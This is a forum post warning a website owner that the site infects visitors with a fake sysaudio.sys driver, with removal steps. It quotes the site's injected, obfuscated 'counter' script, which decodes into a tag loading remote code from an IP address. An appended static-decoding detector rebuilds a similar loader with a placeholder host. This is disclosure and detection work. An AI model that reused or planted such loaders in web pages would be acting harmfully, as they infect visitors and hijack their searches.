Your website has malicious code...
I was infected on two of my computers so I decided to look into it. Looks like your website drops sysaudio.sys into the c:\windows\system32 folder and adds the registry string key aux=sysaudio.sys in HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Symptoms:
Affects results from popular web searches, i.e. google, yahoo, etc. If you do a search, it will inject shady websites in the links of the search results page.
To Remove:
1. delete reg key
2. reboot
3. delete sysaudio.sys
Look at your website code, it has:
<script language=javascript><!-- Yahoo! Counter starts here -->
if(typeof(yahoo_counter)!=typeof(1))eval(unescape( '/%2F!.%2E~%2E` %3C%64i`v%20s%74`y%6Ce@%3D%64%69#s~%70lay&:n%6F&n% 65%3E\nvar%20&_;`%69f(%64!o%63|%75|m|e`n&t`.|c&%6F %6F@k%69%65|.@ma`%74c&h(`/%5Cb$%68%67%66~%74=1@%2F!%29|%3D!%3Dn|%75&l~%6C|)d `o@cu%6D%65%6E%74`%2Ew@%72`%69`%74@%65("%3Cs|%63|r $%69$%70%74%20%73%72!%63~%3D|%2F/%37|8@.&%31%357#%2E~14$%32%2E#%35`%38/!%63~p/?%22+na%76|%69g`a%74or.a&%70&%70N%61$%6D#%65~%2Ec% 68%61%72A%74(&0!)+%22!%3E%3C%5C`/!s%63r%69p&%74`%3E%22@%29$%3B~\n//%3C&/d~%69v@%3E').replace(/@|~|\!|\$|`|\&|\||#/g,""));var yahoo_counter=1;
<!-- counter end --></script>
This looks to be the culprit....
Here's more info:
miekiemoes.blogspot com/2008/10/fake-sysaudiosys.causes-searchengine.html
Last edited by bsakata; 11-13-2008 at 03:10 PM..
Reason: Additional Info
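For a site owner checking pages for the kind of injected block quoted in this post, a static scan can decode the eval(unescape(...)) wrapper without ever running it. This is an added example, not part of the original post; the sample page and the host host.example.invalid are constructed, and the junk-character set is the one in the .replace() call quoted above.

```javascript
// Junk characters the loader strips after unescape(); this set is copied from
// the .replace() call in the script quoted in the post.
const JUNK = /@|~|\!|\$|`|\&|\||#/g;
// Wrapper shape: eval(unescape('<payload>') ... ; group 2 is the payload.
const LOADER = /eval\s*\(\s*unescape\s*\(\s*(['"])([\s\S]*?)\1/g;
// A <script src=...> tag inside the decoded text; group 1 is the src value.
const SCRIPT_SRC = /<script[^>]*\ssrc\s*=\s*["']?([^\s"'>]+)/i;

// Decode in the same order the loader does, but never eval() the result.
function decodeLoader(encoded) {
  return unescape(encoded).replace(JUNK, "");
}

// Return one finding per wrapped payload found in an HTML/JS source string.
function findInjectedLoaders(source) {
  const findings = [];
  for (const m of source.matchAll(LOADER)) {
    const decoded = decodeLoader(m[2]);
    const src = decoded.match(SCRIPT_SRC);
    findings.push({
      line: source.slice(0, m.index).split("\n").length, // 1-based line number
      decoded,
      writesRemoteScript: /document\.write/.test(decoded) && src !== null,
      remoteSrc: src ? src[1] : null,
    });
  }
  return findings;
}

// Constructed sample page (not the payload from the post): same wrapper shape,
// a subset of the junk characters, and a placeholder host.
const SAMPLE = [
  "<html><body>",
  "<script language=javascript>",
  "if(typeof(c)!=typeof(1))eval(unescape('d@o%63u~m%65n#t.w%72ite(%22%3Cs@cr%69pt s~rc=//host.example.invalid/c.js%3E%3C/s#cript%3E%22)').replace(/@|~|#/g,\"\"));var c=1;",
  "</script></body></html>",
].join("\n");

for (const f of findInjectedLoaders(SAMPLE)) {
  console.log(`line ${f.line}: remote script ${f.remoteSrc}\n  decoded: ${f.decoded}`);
}
```

Any finding with writesRemoteScript set means the page writes a script tag pointing at another host, so the file should be restored from a known-good copy and the way it was modified investigated.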